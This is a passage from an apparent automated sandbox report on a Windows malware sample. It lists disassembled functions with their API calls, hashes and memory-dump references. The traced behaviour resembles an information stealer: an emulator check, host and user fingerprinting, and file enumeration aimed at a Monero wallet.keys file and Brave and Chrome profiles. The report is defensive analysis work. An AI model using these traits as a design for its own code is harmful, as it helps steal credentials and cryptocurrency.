                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 84f3048af2cc390b565958d990ab7cd8e5de9de882446ea23c319d0f63d03886
                          • Instruction ID: 31fa46fd4e5fc402f28a198e4cfa08a08030b633e4d02772dfe612f2155657de
                          • Opcode Fuzzy Hash: 84f3048af2cc390b565958d990ab7cd8e5de9de882446ea23c319d0f63d03886
                          • Instruction Fuzzy Hash: 97011DB0D44318FAEB10DBE4ED49BAEBB78AB24705F308048F705B62C0D7B455558B99
                          Function 001378E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: f224350183e7be5603a122b1e99862ea7198cfd4987cab6405a4df70a482dd9f
                          • Instruction ID: 9140dcc8c5739ed301473ee0128126c76a4c78db7c1f98bf069fc178ed9db50e
                          • Opcode Fuzzy Hash: f224350183e7be5603a122b1e99862ea7198cfd4987cab6405a4df70a482dd9f
                          • Instruction Fuzzy Hash: 010181B1A04608EBD714DF99DD45BAABBBCFB04B35F10421AFA45F7280C37459008BA2
                          Function 00121110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0012112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00121132
                          • ExitProcess.KERNEL32 ref: 00121143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 7bd441c9996da7c3257481cb81a114f1dfd27ac2a52912b31e6c777125aa928c
                          • Instruction ID: e50794417332e81ba0d084ca16cab0facfd6ded9e8d8c312877d42d6fd822d0c
                          • Opcode Fuzzy Hash: 7bd441c9996da7c3257481cb81a114f1dfd27ac2a52912b31e6c777125aa928c
                          • Instruction Fuzzy Hash: 3DE0E671985308FBE711ABA0AC0AB097A7CEB14B01F104154F709771D0D7F526509A99
                          Function 001210A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001210B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001210F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 1c421bd8f8da481a94df737dfae69165ec29d1fd7962cccdb10140c783ff3785
                          • Instruction ID: 48eba0d768a20eb4d7568c3f18bd81710ebbe4bcd59b063549cf6146834fe06c
                          • Opcode Fuzzy Hash: 1c421bd8f8da481a94df737dfae69165ec29d1fd7962cccdb10140c783ff3785
                          • Instruction Fuzzy Hash: 86F0E271641318BBE714DBA4AC49FAAB7ECE705B15F305448F504E3280D672AE00CBA4
                          Function 00121190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 001378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                            • Part of subcall function 001378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                            • Part of subcall function 001378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                            • Part of subcall function 00137850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                            • Part of subcall function 00137850: RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                            • Part of subcall function 00137850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                          • ExitProcess.KERNEL32 ref: 001211C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 9bdf2a04e1185e7501135741a9c6a23ea3c7b811ac0664166280a452f11c9da7
                          • Instruction ID: 30238aba1440ac1905e5c6760280a6b4710a8a82ed5d3156743dc4c165844f70
                          • Opcode Fuzzy Hash: 9bdf2a04e1185e7501135741a9c6a23ea3c7b811ac0664166280a452f11c9da7
                          • Instruction Fuzzy Hash: 13E012B591430963CA10B3B5BC0AB2A369C5B34345F044825FA49E3152FBA5F8208A66

                          Non-executed Functions

                          Function 001338B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 001338CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 001338E3
                          • lstrcat.KERNEL32(?,?), ref: 00133935
                          • StrCmpCA.SHLWAPI(?,00140F70), ref: 00133947
                          • StrCmpCA.SHLWAPI(?,00140F74), ref: 0013395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00133C67
                          • FindClose.KERNEL32(000000FF), ref: 00133C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 677925c16722eb82d85a4ccd45eef9cc3d9b765909d32ab58175c9bf4331eabc
                          • Instruction ID: 3d6e61189d7fc2ba31a0cc8d86a0e578b8d143a86c23e63bafc2a329abdbc331
                          • Opcode Fuzzy Hash: 677925c16722eb82d85a4ccd45eef9cc3d9b765909d32ab58175c9bf4331eabc
                          • Instruction Fuzzy Hash: 00A13FB1A00218ABDB25DFA4DC85FEA737DBF58300F048598E61DA6141EB759B84CF62
                          Function 0012BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • FindFirstFileA.KERNEL32(00000000,?,00140B32,00140B2B,00000000,?,?,?,001413F4,00140B2A), ref: 0012BEF5
                          • StrCmpCA.SHLWAPI(?,001413F8), ref: 0012BF4D
                          • StrCmpCA.SHLWAPI(?,001413FC), ref: 0012BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0012C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 7db0857ceb1c53666d7675ed3186614f1683e23fd6b07bb965de1ef9f5f4fc5a
                          • Instruction ID: 928744e46e6e00fdcf3b4c9f480dbcd7202f247b82a19801fe494e8d7ad0899c
                          • Opcode Fuzzy Hash: 7db0857ceb1c53666d7675ed3186614f1683e23fd6b07bb965de1ef9f5f4fc5a
                          • Instruction Fuzzy Hash: E8427772900104ABDB14FBB0DD96EED737DAF64300F808598F946A7191EF34AB49CB92
                          Function 00134910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0013492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00134943
                          • StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                          • StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                          • FindClose.KERNEL32(000000FF), ref: 00134B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 8e1891053150488f9f59d2b6b151f77e9d6496c88811c03d688b1f5f922e3716
                          • Instruction ID: 6a1acb3193fe363f59e667c22384f1073bab745da45a41f32e2b8a2a2acef5c6
                          • Opcode Fuzzy Hash: 8e1891053150488f9f59d2b6b151f77e9d6496c88811c03d688b1f5f922e3716
                          • Instruction Fuzzy Hash: 386188B1900618ABCB25EBA0DC49FEA737CBF58701F048598F609A6041EB75EB85CF91
                          Function 00134570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00134580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00134587
                          • wsprintfA.USER32 ref: 001345A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 001345BD
                          • StrCmpCA.SHLWAPI(?,00140FC4), ref: 001345EB
                          • StrCmpCA.SHLWAPI(?,00140FC8), ref: 00134601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0013468B
                          • FindClose.KERNEL32(000000FF), ref: 001346A0
                          • lstrcat.KERNEL32(?,00F0F8A0), ref: 001346C5
                          • lstrcat.KERNEL32(?,00F0E3B0), ref: 001346D8
                          • lstrlen.KERNEL32(?), ref: 001346E5
                          • lstrlen.KERNEL32(?), ref: 001346F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 095256b7e19e3a4bfad6a3df4b272ae402761152ee7e987a224eb7b56ccbe972
                          • Instruction ID: 54bff528d3786076b9e6c93a2a4b44f8329e94ccd5e1a1f040b601dfaf7d9ed5
                          • Opcode Fuzzy Hash: 095256b7e19e3a4bfad6a3df4b272ae402761152ee7e987a224eb7b56ccbe972
                          • Instruction Fuzzy Hash: 255168B1940218ABC725EBB0DC89FED777CAF58700F408598F649A6150EBB5EB84CF91
                          Function 00133EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00133EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00133EDA
                          • StrCmpCA.SHLWAPI(?,00140FAC), ref: 00133F08
                          • StrCmpCA.SHLWAPI(?,00140FB0), ref: 00133F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0013406C
                          • FindClose.KERNEL32(000000FF), ref: 00134081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 0cc61c1fa4f8dc490fdaf50a1dc73257f5e0c92d7da3c414bd3a2241841ac165
                          • Instruction ID: 9a656457444c6cf59f0a24a8edba30dfeee65ca1849274c0e6971a50f52af09d
                          • Opcode Fuzzy Hash: 0cc61c1fa4f8dc490fdaf50a1dc73257f5e0c92d7da3c414bd3a2241841ac165
                          • Instruction Fuzzy Hash: 3E5158B1900618ABCB25EBB0DC85EEE777CBF58300F408598F659A6040DB75EB898F95
                          Function 0012ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0012ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0012ED55
                          • StrCmpCA.SHLWAPI(?,00141538), ref: 0012EDAB
                          • StrCmpCA.SHLWAPI(?,0014153C), ref: 0012EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0012F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
